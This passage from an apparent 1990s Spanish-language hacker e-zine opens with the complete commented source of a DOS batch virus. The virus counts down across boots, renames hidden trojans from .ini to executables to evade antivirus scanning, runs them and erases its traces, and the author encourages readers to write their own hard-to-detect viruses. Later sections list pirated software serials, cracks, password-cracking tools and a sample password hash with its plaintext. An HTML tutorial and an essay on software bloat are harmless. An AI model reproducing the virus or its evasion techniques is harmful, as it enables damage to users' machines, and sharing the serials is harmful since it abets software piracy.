@echo off
~@~ borra el input del prompt
if exist c:\windows\countdw.001 goto menos1
~@~ revisa si existe el archivo countdw.001 si es asi, brinca a menos1
if exist c:\windows\countdw.002 goto menos2
~@~ revisa si existe el archivo countdw.002 si es asi, brinca a menos2
if exist c:\windows\countdw.003 goto menos3
~@~ revisa si existe el archivo countdw.003 si es asi, brinca a menos3
if exist c:\windows\countdw.004 goto menos4
~@~ revisa si existe el archivo countdw.004 si es asi, brinca a menos4
if exist c:\windows\countdw.005 goto menos5
~@~ revisa si existe el archivo countdw.005 si es asi, brinca a menos5
if exist c:\windows\countdw.006 goto menos6
~@~ revisa si existe el archivo countdw.006 si es asi, brinca a menos6
if exist c:\windows\countdw.007 goto byebye
~@~ revisa si existe el archivo countdw.007 si es asi, brinca a byebye
if not exist c:\windows\userz1.dat goto explode
~@~ si no existe c:\windows\userz1.dat brinca a explode
goto end
~@~ si encuentra a c:\windows\userz1.dat brinca al final
~@~ para hacer al virus una bomba de tiempo remueve las dos ultimas lineas
~@~ dejando el comando "goto explode" despues de revisar el countdw.007
:byebye
~@~ esta es la rutina destructiva!
if not exist c:\windows\sysinis.ini goto nobomb
~@~ si no existe c:\windows\sysinis (el troya#1) brinca a nobomb
copy c:\windows\sysinis.ini c:\windows\bye.exe /y >nul
~@~ copia el sysinis.ini a un ejecutable. Hace esto para evitar que algun
~@~ antivirus revise el troya aunque hasta la fecha el incluido por default
~@~ no es detectado.
del c:\windows\countdw.007 >nul
~@~ borra el archivo countdw.007
c:\windows\bye.exe help
~@~ ejecuta el archivo bye.exe alterado con HACKCOM *del programa kaos* para
~@~ ejecutarse normalmente (grafica) y como tiene la clave help despues el
~@~ otro programa 'pegado' (troya).
:nobomb
~@~ en caso de no encontrar c:\windows\sysinis.ini cae aqui el control.
if not exist c:\windows\bakbmb.ini goto kill
~@~ si no existe el otro troya brinca a kill :-(
copy c:\windows\bakbmb.ini c:\windows\bye2.com /y >nul
~@~ copia el bakbmb.ini a bye2.com (troya#2)
c:\windows\bye2.com
~@~ ejecuta el troya#2
cls
echo.
echo Bye Bye virus... por RareGaZz
echo http://www.geocities.com/Baja/4426
echo.
pause
goto kill
~@~ brinca a Kill
:kill
~@~ aqui se borran las huellas del virus (en caso de ser virus y no troya los
~@~ archivos ejecutados o tal vez solo una grafica.
del c:\windows\after.bat >nul
del c:\windows\bakbmb.ini >nul
del c:\windows\sysinis.ini >nul
goto end
~@~ brinca al final del virus.
:menos6
~@~ si encuentra el archivo countdw.006 lo copia a c:\windows\countdw.007
~@~ y elimina el anterior.
copy c:\windows\countdw.006 c:\windows\countdw.007 /y >nul
del c:\windows\countdw.006
goto end
:menos5
~@~ si encuentra el archivo countdw.005 lo copia a c:\windows\countdw.006
~@~ y elimina el anterior.
copy c:\windows\countdw.005 c:\windows\countdw.006 /y >nul
del c:\windows\countdw.005 >nul
goto end
:menos4
~@~ si encuentra el archivo countdw.004 lo copia a c:\windows\countdw.005
~@~ y elimina el anterior.
copy c:\windows\countdw.004 c:\windows\countdw.005 /y >nul
del c:\windows\countdw.004 >nul
goto end
:menos3
~@~ si encuentra el archivo countdw.003 lo copia a c:\windows\countdw.004
~@~ y elimina el anterior.
copy c:\windows\countdw.003 c:\windows\countdw.004 /y >nul
del c:\windows\countdw.003 >nul
goto end
:menos2
~@~ si encuentra el archivo countdw.002 lo copia a c:\windows\countdw.003
~@~ y elimina el anterior.
copy c:\windows\countdw.002 c:\windows\countdw.003 /y >nul
del c:\windows\countdw.002 >nul
goto end
:menos1
~@~ si encuentra el archivo countdw.001 lo copia a c:\windows\countdw.002
~@~ y elimina el anterior.
copy c:\windows\countdw.001 c:\windows\countdw.002 /y >nul
del c:\windows\countdw.001 >nul
goto end
:explode
~@~ rutina que al no encontrar c:\windows\userz1.dat empieza el conteo.
if not exist c:\windows\win.com goto kill2
~@~ si no existe c:\windows\win.com brinca a kill2
copy c:\windows\win.com c:\windows\countdw.001 /y >nul
goto end
:kill2
~@~ elima el virus del sistema.
del c:\windows\winstart.bat >nul
del c:\windows\sysinis.bat >nul
del c:\windows\bakbmb.ini >nul
:end
~@~ la ultima rutina.
if exist c:\windows\after.bat call c:\windows\after.bat
~@~ busca a after.bat si existe lo ejecuta.
----------FIN del bye bye virii por raregazz-----CHKSYS.BAT-------------------

Espero le hayas entendido al codigo del virus, crea uno tu mismo y veras lo
facil que es hacer virus efectivos y dificiles de detectar. Si usas el
ejemplo contenido en el archivo adjunto a la revista (virii.zip) copia algun
demo o programa no da¤ino a los archivos c:\windows\sysinis.ini y
c:\windows\bakbmb.ini para que veas por tu mismo la efectividad del virus.
Descomprime virii.zip y corre install.bat en una pc y cuando quieras empezar
el conteo borra c:\windows\userz1.dat

>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<
******************************************************************************
>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<

R3v1S10/\/ D3 W4R32
por Siskel&Ebert

A muchos nos gusta atiborrar nuestro espacio en disco para tener las mejores
cosas que podamos conseguir en internet aunque casi siempre terminamos
guardando programas que nunca volveremos a utilizar pero no los borramos por
el temor de necesitarlos en cuanto uno de los clusters del archivo borrado
sea ocupado por otro.
Para que ustedes tengan una idea del warez que pueden conseguir en internet
que peca de no estorbar me he puesto a escribir una guia de software
inspirado en la guia para internet que aparecio en el numero 2
Para encontrar los programas usa los servicios de www.shareware.com
o www.download.com aunque tambien podrias buscar el archivo por el nombre
del programa en alguna maquina de busqueda.

[ Despues de algun tiempo de busqueda (aprox. 15 minutos) RareGaZz pone a su
entera disposicion TODOS los programas mencionados en este articulo en la
pagina oficial del MagaZine... CkSmkr ]

>-ENCRIPCION-<

PGP
~~~
El mejor programa de encripcion de archivos que puedan tener. La encripcion
se basa en la tecnica de las llaves publicas y como ya fue ampliamente
revisado en esta revista ahi la dejamos.

PGPFONE 1.0b2
~~~~~~~~~~~~~
Programa para conversaciones por telefono seguras. Ya lo he utilizado un par
de veces y nada es mas gracioso que usar este programa, te pones los
audifonos de tu tarjeta de sonido conectas el microfono y si tu tarjeta no
es "full duplex" terminaras usando el telefono como un radio cb. Imagina una
conversacion tipica con pgpfone:
- watz up! tienes algun nuevo warez? cambio
- simon me acaba de llegar el office 97!! cambio
- a toda eme cuando puedo pasar por el? cambio
- ma¤ana a las dos en punto donde siempre... cambio y fuera.

Blowfish Advanced 95
~~~~~~~~~~~~~~~~~~~~
Mejor programa para encripcion basada en claves no podran encontrar! Tiene
muchisimas opciones para todos los paranoicos haya fuera. En este programa
encontraras mas algoritmos que en tu libro de matematicas ademas tiene un
feature especial llamado TEMPEST que permite escribir la clave sin temor
a ser capturada por espias internacionales :))) si eliges la opcion tempest
tu teclado producira 'ruido' y la pantalla se vera como una disco de tijuas
a las 4 de la ma¤ana.
Los algoritmos que puedes usar para encriptar son :
- Blowfish
- Blowfish 32
- GOST
- Triple DES
- Cobra
- IDEA [ La version mas nueva no lo tiene disponible ]
Despues de encriptar puedes usar una de las tantas opciones de wiping que
incluye SFS wiping (un tipo de eliminado de archivos) y otras. Tambien puedes
usar mixed encription por si quieres usar dos algoritmos para encriptar tus
archivos [ ya no disponible ] y si lo deseas cuenta con una opcion que si la
eliges renombra todos los archivos encriptados con nombres totalmente
insignificantes. Tiene muchas opciones por eso es imposible explicarlas todas
en este texto lo malo es que la version shareware unicamente permite claves
de 4 digitos por lo que el archivo necesario para registrarlo viene incluido
en esta revista :)


[ Despues de leer este texto busque el programa y me encontre con una version
mas nueva y no aparece el algoritmo IDEA -usado en pgp- ni el `feature' ese
de mixed encription asi que como buen hacker investigue...

From: raregazz@bigfoot.com
To: tis5maha@rz.fht-esslingen.de
Subject: encription...

>Why do you remove de double encryption routine?? That was the most hype
>thing in your program and in version 82e is gone...along with IDEA.
>It seems to me your program is getting better in design but worse in
>security. Or may be am wrong, can you please tell me what was the error
>in the double encription scheme? I need to know because I am still using
>version 81a that seems to be more powerful and I need to know if the
>encription am using is "secure" with the double encription thingie.

From: tis5maha@rz.fht-esslingen.de
To: raregazz@bigfoot.com
Subject: Re: encription...

>IDEA was removed due to license problems, but it will return in BFA97
>as a free driver which you can add to the application.
>Double encryption was removed because it was futile. Sounds strange,
>but one can prove it with the so-called "meet-in-the-middle" attack that
>double encryption just increases the keyspace to one bit. Although the
>attack is more or less just a mathematical thing (one will need megatons of
>memory and computer power) I decided to remove this feature, because you'll
>never know if someone has exploited that attack to work more efficiently.
>The new UCDI concept in BFA97 will enable programmers to design their
>own drivers as they like it (e.g. write a triple encryption driver with
>a Blowfish-IDEA combination).
>
>Markus

un agradecimiento al creador del programa por explicarme la razon de haber
eliminado en su mas reciente version algunas features de su programa. Al
parecer en verdad esta interesado en mantener fuerte y sin vulnerabilidades
su pieza de software Blowfish Advanced. CkSmkr]

Puffer
~~~~~~
No tan bueno como el anterior pero mas facil de usar para encriptar mensajes
de email si las personas que se comunican saben la clave de desencriptado.
Tiene varias desventajas (usa solo blowfish) pero es una buena opcion para
los usuarios de windows 3.1 con una linea de comunicacion segura donde
puedan pasarse la clave (telefono). Tiene la opcion de limpiar el espacio
vacio del disco que parece no funcionar con windows 95.
[ blowfish advanced 95 tambien tiene esta opcion y si funciona con win95 ]


>-ACCESORIOS-<

Powertoys
~~~~~~~~~
Son unas herramientas de microsoft que realizan distintas cosas, yo no les
recomendaria instalar todas pero si deskmenu y tweak UI. Deskmenu es un icono
en la barra de tareas que al ser presionado despliega un menu con los
contenidos del escritorio. Tweak UI tiene muchisimas opciones asi como
tambien settings de 'paranoia'. Para instalar se descomprime powertoys en un
directorio temporal y se hace doble click en los archivos .inf del programa
que se quiera instalar.

AniDesk
~~~~~~~
Utileria 100% estetica para nuestro escritorio. Una vez ejecutada pone en
la pantalla un icono animado y hace que el escritorio se vea comico.
contiene varios iconos como la tierra, una hamburguesa y varios mas aunque
tambien puedes crear los propios.

WINZIP 6.3 32bits
~~~~~~~~~~~~~~~~~
La mejor compresion de datos con la capacidad de guardar archivos con
nombres largos y crear autoexecutables para windows 95. Los botones son unas
graciosas graficas en 3D. Sin duda el mejor programa de compresion.
Disponible en www.winzip.com y el codigo de registro esta en los numeros
anteriores de la revista.

PureVoice -Qualcomm-
~~~~~~~~~~~~~~~~~~~~
De los creadores de Eudora sale este programa que nos permite enviar y
recibir mails con voz clara y de poco tama¤o. Un mensaje de unos 300k podria
mandar hasta 5 minutos de voz continua. Tiene dos tipos de voz, la de mas
alta calidad ocupa 13k por segundo y la otra de menor calidad 8k por segundo.
[ puedes enviar correo a raregazz usando este programa :) ]

RegClean
~~~~~~~~
Un casi excelente limpiador de nuestro registro de windows 95 que acelera
el tiempo necesario para iniciar nuestra computadora. Tiene algunos errores
por ejemplo cuando ponemos en nuestros folders el "auto arrange" despues de
ejecutar esta utilidad esta opcion se desabilita.

MapEdit
~~~~~~~
Con este programa los mapas graficos para archivos HTML son faciles de hacer
y sin conocimiento del lenguaje hyper text markup languaje. Se maneja con
figuras geometricas y el codigo generado se copia al clipboard y despues
se tiene que pegar al archivo HTML o el programa lo genera.
serial number: BJJNBKBA

>-AUDIO-<

Cool Edit 96
~~~~~~~~~~~~
Esta programa es especial para usar y editar archivos de audio. Tiene filtros
reductores de ruido y efectos especiales como marcianos, tuneles y radio. Con
el programa shareware unicamente se puede elegir entre un efecto de muchos
pero el codigo de registro es:
name: raregazz name: cooldude
serial: XHMXJUIB serial: LWGLJZRP
Quiero agradecer a camelo por pasarme este programa :-O

RealPlayer
~~~~~~~~~~
Un plugin para tu browser que te permitira escuchar sonido en linea
rapidamente y tambien video. Las versiones light son gratuitas y las puedes
conseguir en www.real.com y/o www.realplayer.com

>-GRAFICOS-<

LviewPro
~~~~~~~~
Programa para ver graficos de distintos formatos. Tiene tambien muchos
filtros que sirven para agregar distintos efectos a las imagenes como el blur
y tambien suaviza la imagen en caso de ser esta de baja calidad.
Con este programa puedes crear slideshows del numero de graficas que quieras
y tambien en una pantalla puedes poner un preview de todas las graficas que
tu quieras. Todo esto desde el menu file-multiple open.
El codigo de registro esta en el primer numero de la revista.

MicroAngelo 95
~~~~~~~~~~~~~~~
Si necesitas editar o crear tu propio icono animado para windows 95 (.ani)
o un icono normal (.ico) este programa te permite hacerlo. Hay dos versiones
de este programa en internet y una no permite la creacion de iconos animados.
El crack esta en los numeros pasados de la revista.

Microsoft Gif Animator
~~~~~~~~~~~~~~~~~~~~~~
Un simple animador de imagenes gif89 tipo cuadro por cuadro. Lo util de este
programa es la capacidad de pasar del formato avi al gif las animaciones. No
tiene ninguna otra opcion y es gratuito. Lo puedes encontrar en
www.microsoft.com

Morpher for Windows 1.2
~~~~~~~~~~~~~~~~~~~~~~~
Este programa es un poco complicado pero una ves entendiendo su manejo es
facil crear el efecto morphing de dos imagenes bmp. vienen dos ejemplos
bastante impresionantes que sirven de base para tus trabajos. El programa
funciona con windows 3.1 y windows 95. Codigo de registro:
Name: (cualquier nombre)
Code: 97044

Ulead Gif Animator 1.5
~~~~~~~~~~~~~~~~~~~~~~
Este animador de GIF's deja atras a la competencia ofreciendo varios efectos
para las animaciones que valen la pena un vistazo! Tambien puede importar
animaciones avi's y a¤adirle efectos como persianas, morphing y algunos
otros. El periodo de prueba es de 15 dias y aun no tengo el crack :(

ACIDDRAW 1.2
~~~~~~~~~~~~
Un programa de dibujo ANSI/ASCII que permite crear y editar archivos graficos
COM, ANSI, ASCII, BINARIOS, PASCAL, C, PCBOARD, y ASM.
Los menus de edicion de graficos son faciles de entender y tambien hay una
utilidad llamada AcidView para ver los archivos que este programa genera y
los graficos como jpg y gif.

>-INTERNET-<

HomeSite
~~~~~~~~
Este programa permite la creacion de paginas web como si se tratara de un
editor de textos comun. No es necesario el conocimiento del HTML pero algunas
cosas como la creacion de mapas graficos resultan complicadas usando este
programa. www.allaire.com

Name: Siskel&Ebert Name: RareGaZz
Code: 239624079488 Code: 319539881279

>-HACKS-<

John the ripper 1.3 Alpha 3 (DOS)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
El mejor cracker disponible para computadoras pentium. Es rapidisimo y no
son necesarias las listas de palabras para su funcionamiento ya que tiene
un feature llamado "incremental generator" que si editamos el archivo
john.ini podemos hacer un ataque bruto probando todos los caracteres de
cierto numero de caracteres [ ??? ]
Si quieres probar el funcionamiento de tu cracker mide el tiempo que se
tarda en quebrar el siguiente password:

micuenta:KkhJDtJd.gERE:
-el password encriptado es raul-
[ esto es lo mas cerca que mucha gente estara de un /etc/shadow ! >:) ]

XiT
~~~
Otro cracker para DOS pero muchisimo mas lento que john the ripper. Tiene
pocas features y es bueno unicamente para las 386's o peores...

Hackers Utility v1.02
~~~~~~~~~~~~~~~~~~~~~
La mejor utileria para hackers que hasta ahora haya visto. Junto con el
programa vienen serial numbers, funciones del sistema como shutdown, log off
y muchas otras para windows NT. Tambien tiene incluidas como herramientas un
cracker de unix mas rapido que cracker jack y un rapidisimo cracker de
archivos comprimidos zips. Tiene tambien utilerias de red como finger, un
scanner de puertos I.P y muchas otras cosas. Este programa merece 5
estrellitas en la frente (o sus autores).
[ no esta disponible en la pagina web :( por que no lo encontre. cksmkr ]

WinHacker 95
~~~~~~~~~~~~
Un hacker personal para windows 95. Tiene muchas opciones disponibles pero
la mas significativa es la capacidad que tiene el programa de cambiar el
nombre de la persona y la compa¤ia a la que esta registrado windows.
Tambien puede remover la pantalla de inicio de windows 95 y puede configurar
tu sistema win95 para que inicie en prompt DOS.

>-FINALE-<

Abur se cuidan y no coman tierra.

= la mayoria de los hacks los saque de www.astalavista.com =

>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<
******************************************************************************
>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<

Exceso Digital

Recientemente me he visto forzado a buscar nuevo software y hardware
desde que empeze a sufrir la indignidad de actualizar mi sistema. No puedo
creer que los productores han avanzado tan salvajemente mientras yo no
estaba viendo - la complejidad esta fuera de control.
He pasado mucho tiempo frente a las computadoras en los a¤os pasados. La
gente a hecho chistes acerca de mi dependencia al email y toda mi familia
me recuerda usando una laptop desde mis primeros dias en preparatoria.
Pero las computadoras pueden ser como botas de eskiar. Las viejas tienden
a mantenerse eficientes, comprar unas nuevas significa dolor de pies. Asi
que yo estoy chapado a la antigua en computadoras. Ni siquiera uso un
programa de email sino que lo leo y mando desde mi adorable terminal UNIX.
Pero inevitablemente llega un tiempo en que esas botas de piel favoritas
tienen que ser cambiadas por un nuevo par. Ese tiempo me llego en los
primeros dias de 1997 y los nuevos dolores de cabeza digitales que he
descubierto aun no se han calmado. Para mi suerte cuento con la ayuda
de unos de los mejores en el terreno de las computadoras, los llamados
"power users" me pregunto que es lo que hace la sociedad en general cuando
necesitan ayuda ?

Software excesivo

El problema radica en el tipo de software que usamos, lleno de "features"
y cositas que hacen explotar en tama¤o a los nuevos sistemas. Soy propenso
a quejarme cada vez que Andy (intel) crea un procesador mas rapido Bill
(microsoft) usa mas de el. Resulta ser no tan gracioso. Simplemente hecha
un vistazo a la complejidad del Word de microsoft mas reciente. Es
simplemente increible, y cada nueva version se esta poniendo peor. Ha
llegado el punto en que la mayoria de los programas son inservibles y se
ejecutan mas lento que como lo hacian una decada atras. ¨ Que esta mal con
el chico de Redmond Mr. Microsoft ? Quizas aprenda algo de la facilidad de
uso de su nueva compra: WebTV.
Mi vida adulta y profesional se basa en intentar hacer a las computadoras
mas faciles de usar. En el a¤o de 1965 las personas pensaban que solo los
maricas necesitaban graficas. En 1972, cuando gastabamos 256k guardando
imagenes la gente lo veia como una indecencia y arrogancia.
¨Por que alguien utilizaria tanta harina en la cubierta y no en el relleno?

Tres decadas despues encontramos una generacion de ni¤os que no cuenta la
memoria en k's sino en m's (y proximamente en G's). Esto es maravilloso,
pero fijense en lo que utilizamos esa memoria!! La interfaz no ha cambiado
radicalmente desde la introduccion de la Macintosh mas de una decada atras.
Es solo mas dificil de usar y obsesivamente compleja. Alguien necesita un
reloj despertador.
Como un devoto de las Macintosh con suficientes de ellas en mi closet, me
encuentro actualmente frustrado con los ultimos modelos. La peque¤a cara
que nos recibia en el inicio de nuestras sesiones se a vuelto tan compleja
que una Mac no es mas facil de usar que una Wintel. Asi, como muchos otros,
decidi que era tiempo de cambiar de plataforma.
Hice mi primera entrada con Windows hace un mes o dos y quede tan apaleado
que regrese corriendo a mi Mac como alguien que regresa al camion despues
de probar el nuevo tren subterraneo. Me sorprendio que mucha gente usara
windows 95 sin quejas y supongo eso se debe POR QUE NO HAY ALTERNATIVA.

Ni PC o NC, sino SC

La gente me pregunta con frecuencia que opino de la NC (Network Computer),
una idea de la gente de Oracle que se basa en una terminal casera con un
drive removible y todos mis datos en algun servidor lejos de mi alcance.
Bill Gates viendo esto como una amenaza a su imperio a lanzado ya su
terminal Windows para la NC, una vez mas el mal predomina.
El hecho triste es que NC o PC, las dos, estan terriblemente mal. Pero tu
y yo no tenemos alternativa.
El mundo no necesita una PC o NC sino una SC (scalable computer) que seria
una maquina modular que fuera tan simple como el pay (y sin costar mucho
mas) y que tenga la capacidad de crecer de una simple editora de textos a
una supercomputadora. Personalmente estoy decidido a permanecer en el punto
mas bajo de la escala.
Por que? pues por que no hay cupo para Windows 95 en Africa. Muchas otras
partes del mundo tambien necesitan equipo facil de conseguir y manejar.
Siempre pense que este era un problema diferente al que me preocupaba a mi
pero repentinamente abri los ojos y me di cuenta que mi problema no es mucho
mas distinto al de un pakistani tratando de manejar su primera computadora
sin importar que yo tuviera talento a mi dispocision y recursos. Las
computadoras hoy en dia son terriblemente dificiles de usar.

Que otra cosa podemos hacer aparte de quejarnos? es tiempo de una huelga por
los usuarios de computadoras? claro que si. Cualquier persona que este
creando los sistemas del ma¤ana debe poner los pies en la tierra y darse
cuenta que las aplicaciones del ma¤ana necesitan ser aplicaciones faciles
de usar con operaciones sencillas. Necesitan dejar de hacer software con
opciones sofocantes que son creados por genios para genios. ¨ por que no
intentar hacer algo para el resto de nosotros ?

Una solucion por el momento seria recomendar a los principiantes a usar
un servicio en linea para entrar a internet como AT&T WorldNet (mexico).Pero
cuando trate de instalarlo yo mismo las primeras palabras del instructivo
decian "Apague la proteccion del software para virus usando el extensions
manager" ¨ QUE DIABLOS SIGNIFICA ESO PARA PAPA Y MAMA ? Despues, como era
predecible, el instalador causo un crash en mi sistema.

NiK

>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<
******************************************************************************
>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<


ServerHacker Productions(c) Presenta...
*****************
HTML
Para Mortales
*****************
Creado exclusivamente para RareGaZz

HiApAlZ a ver si logro hacerlos entender el HTML a los que no saben como
hacer sus paginas para la red. A lo mejor luego hago otro texto sobre esto y
despues prometo escribir una guia para poder poner una pagina gratuita en la
red. Mientras tanto si ya saben de html mejor brinquense este monton de *%#&
por que se les puede hacer shitty :(

EL PRINCIPIO

Lo primero es conseguir un editor de textos para hacer los archivos HTML.
notepad de windows funciona bien aunque tambien aguanta vi de unix. si usas
un procesador DOS para los HTML algunas letras no se podran ver bien en el
navegador.
Los comandos que el navegador interpreta se ponen en medio de los

  
caracteres
< >. Si algun comando no lo entiende aparecera en el documento tal y como
esta en el texto incluyendo los < >.
Voy a darles un ejemplo para que vean como esta la cosa con los comandos de
este rollo. vamos a suponer que necesitamos que aparezca la palabra "ESTO"
en letras italicas; el comando es <i> y se usaria asi:
ES <i>ESTO</i> OTRA PALABRA
Para evitar que las siguientes palabras tambien se vean italicas se debe
marcar el final del comando con la diagonal / seguida del comando usado
como se ve en el ejemplo. la mayoria de los comandos deben terminar como se
muestra en el ejemplo.

COMANDOS BASICOS

Al iniciar nuestro documento HTML el primer comando que debemos poner en el
archivo es <HTML> (tambien debe terminar al final del archivo con </HTML>).
esto le dice al navegador que se trata de un hypertexto. seguido del comando
inicial html se debe definir el encabezado de la pagina o header, el header
es el texto que aparece en la barra superior del navegador cuando entramos a
una pagina y tambien es lo que se queda registrado en el bookmark de un
navegador.
El encabezado se define con el comando <HEAD> y termina </HEAD>.Muchas veces
es usado el comando <TITLE> despues de head para definir el titulo y debe ser
terminado asi </TITLE> antes de terminar el encabezado. Despues sigue el
cuerpo del documento y este se define con el tag <BODY> este es el ultimo
comando para definir nuestro documento. cuando el body se pone todo lo que se
escriba abajo de el sera mostrado en el navegador. Ahora veremos un ejemplo
sobre lo que trato de explicar.

<html><head><title>Mi primera pagina</title>
</head><body> Esto es un Test </body></html>

Esos simples codigos haran que aparezca en el visualizador (noten que por
fin se me ocurrio un sinonimo) un doc que dira "Esto es un Test" con el
titulo en la barra superior "Mi primera pagina". Vamos apenas empezando...

Con el comando <BODY> podemos decirle al visualizador el color de las letras
de nuestro documento y sobre que fondo deben estar tambien si queremos una
grafica como background -cajum..fondo- ahi tenemos que indicarlo. El color de
los links, de los links ya seguidos y de los links activos como los de email
tambien se pueden definir en el mismo tag <BODY> usando los parametros que
tratare de explicarles.

LINK="#000000"
El parametro link define el color de los links que aparezcan en el doc.

VLINK="#000000"
De este color seran los links que ya hayan sido seguidos por ese navegador.

BGCOLOR="#ffffff"
Aqui se escribe el color del fondo de la pagina.

BACKGROUND="grafica.gif"
Si quieres una grafica como fondo asi lo escribes.

TEXT="#000080"
El color del texto.

ALINK="#0000FF"
El color de los links activos.

Los colores son escritos en valores hexadecimales y si usamos los parametros
estos el tag BODY quedaria asi:

<BODY LINK="#000000" VLINK="#000000" BGCOLOR="#ffffff" BACKGROUND="grafica.gif" TEXT="#000080" ALINK="#0000FF">

COMANDOS ADICIONALES

Sonidos
~~~~~~~
Despues de la etiqueta BODY podria usarse esta linea para hacer sonar un
midi en nuestro documento como fondo. El comando es <BGSOUND> ejemplo:

<BGSOUND SRC="algun.mid" LOOP=INFINITE>
( este comando NO termina con </BGSOUND> )

Otra forma de incluir musica para los visualizadores que no toquen los midis
con el comando anterior es:

<embed src="algun.mid" autostart="true">

El parametro autostart="true" podria ser autostart="false" para permitir que
la persona que vea nuestro documento active el sonido por su cuenta. Al
igual que el otro comando para la musica este tampoco requiere el comando
adicional con la diagonal.

Presentacion
~~~~~~~~~~~~
<BLINK>
Este es uno de los comandos mas inutiles de netscape y para lo que
sirve es para hacer que algo centellee pero como todos los relojes de
las computadoras van a distinta velocidad este tag a veces pasa sin
que sea notado.

<H1>
Este comando sirve para hacer los titulos o encabezados de algun tema
a tratar. Usando el tag <H1> el texto que este entre ese comando sera
de tama¤o grande y bold. Ejemplo: <h1> hola </h1>

<H2>
Lo mismo que el anterior solo que mas peque¤o.

<H3>
Aun mas peque¤o.

<HR size=?>
El comando <HR> pone una linea horizontal en el visualizador
que sirve para dividir los contenidos de alguna pagina. Si se
le agrega el parametro size= se puede cambiar el grosor de la
linea.

<FONT SIZE=?>
Cuando se quiera cambiar el tama¤o de la letra se usa este tag
de html reciente. El texto entre el tag <font size=3> </font>
sera de tama¤o 3. Todos los comandos fonts deben terminar con
el comando </font> incluyendo el siguiente.

<FONT COLOR=?>
Cambia el color de los caracteres entre el tag <font color=red>
y </font>. Los colores se especifican por sus nombres en ingles.

<B>
Este comando pone <b> BOLD </b> el texto entre los tags.

<I>
Para poner <i> italicas </i> un texto o palabra usa este comando.

<U>
Si quieres <u> subrayar </u> algo importante.

Ejemplo General:

<font size=3><font color=blue><b><i><u> HOLA!! </u></i></b></font></font>

Los comandos pueden ser juntados para crear mejores efectos pero siempre
termina el comando correctamente para no modificar el texto sobrante.

Espaciado
~~~~~~~~~

<BR>
Se usa cuando se quiere pasar un espacio en el documento.No requiere
usarse la diagonal para terminarlo.

<P>
Marca el fin de un parrafo. Tampoco es necesario terminarse con la
diagonal.

Forms
~~~~~
Las formas se definen con los comandos <form> y </form>. Son incluidos cuando
queremos feedback o respuestas de los visitantes de una pagina. En medio de
estas etiquetas existen otros tags que funcionan para dar formato a la forma
en que seran insertados los datos. Estas son: <select>, <textarea> e <input>.
Los atributos que le corresponden a la etiqueta o tag <form> son: METHOD y
ACTION.
El atributo METHOD especifica la manera en que el visualizador enviara la
informacion al servidor valiendose de dos auxiliares que son GET y POST.
El atributo ACTION dice hacia donde se deberan enviar los datos obtenidos por
la forma, las formas mas comunes son por medio de un script CGI o tambien
hacia una direccion de correo especificandola con la etiqueta MAILTO como en
el ejemplo siguiente:
<FORM METHOD="POST" ACTION=MAILTO:midireccion@decorreo.net>

<TEXTAREA> Esta etiqueta permite una entrada libre al usuario ofreciendose
como un campo para comentarios. Tiene 3 atributos que definen como sera
esta area de texto: name, rows y cols.
name especifica el nombre del campo de texto.
rows especifica el numero de lineas de texto.
cols especifica el numero de columnas del area.
Un ejemplo de esta etiqueta es:
<textarea name="comentarios" rows="8" cols="40">
Comentarios...</textarea>

<INPUT> Esta es una de las etiquetas mas usadas en las formas ya que tiene
distintos formatos como simples lineas de texto, botones de radio y las
cajas de marca.
La etiqueta a usar para simples lineas de texto como nombres y direcciones
de correo electronico es: TEXT. type="text" se usa para mostrar una linea
de texto. Se puede eligir el numero maximo de caracteres y su longitud con
size y maxlength. Este es un ejemplo de TEXT:

Nombre:<input type="text" name="nombre" size=50 maxlength=50><br>
Edad:<input type="text" name="edad" size=15 maxlength=10><br>

CHECKBOXES Los checkboxes son utiles en ocasiones cuando las preguntas no son
de opcion libre sino que las respuestas estan predeterminadas por el creador
de la forma y pueden ser escogidos 2 o mas campos. Ejemplo:

Selecciona una opcion:<br>
<input type="checkbox" name="opcion" value="uno">Uno
<input type="checkbox" name="opcion" value="dos">Dos
<input type="checkbox" name="opcion" value="tres">Tres<p>

RADIO BUTTONS Los botones de radio a diferencia de los checkboxes unicamente
es posible elegir uno de ellos de cierto campo.

Selecciona una opcion:<br>
<input type="radio" name="opcion" value="uno">Uno
<input type="radio" name="opcion" value="dos">Dos
<input type="radio" name="opcion" value="tres">Tres<p>

RESET Si se comete algun error a la hora de llenar la forma se utiliza este
elemento para borrar todos los campos. He aqui un ejemplo:

<input type="reset" value="Limpiar la forma y empezar de nuevo">

SUBMIT Este elemento se utiliza cuando se a llenado la forma y esta lista
para ser enviada. Ejemplo:

<input type="submit" value="Mandar la forma">

Un ejemplo completo de como una forma seria es el siguiente ejemplo tomado
de la pagina de la revista raregaz en la seccion log-in :)

<FORM><FORM METHOD="POST" ACTION="/cgi-bin/homestead/mail.pl?raregazz">
Nombre____ <INPUT TYPE="text"><BR>
E-Mail_____ <INPUT TYPE="text"><BR>
Ciudad,País_ <INPUT TYPE="text"><br>
Comentarios <INPUT TYPE="text"><p>
<INPUT TYPE="submit" VALUE="Mandar">
<INPUT TYPE="reset" VALUE="Volver a Empezar"><p>
</FORM>

The End
~~~~~~~

>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<
******************************************************************************
>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<

>-C0D3Z-<
"Im too sexy for my warez"

RareGaZz manda la casa por la ventana y gasta mas de 200 dolares en darles
placer a sus lectores con los siguientes codigos...NNOOOTTT!!!
Gracias a un colaborador anonimo ponemos a tu mano los siguientes codigos
para registrar casi toda la linea de software creado por la Cia. sausage
creadores del famoso editor de HTML HotDog. Para poner tu mano sobre estos
programas mientras dura la oferta apunta y dispara tu navegador a
www.sausage.com donde podras encontrarlos en la seccion de software.
~~~~~~~~~~~~~~~
Bookworm
Sirve para crear "jump boxes" Java

---------------- cut here ----------------
User Name: emilio carrion
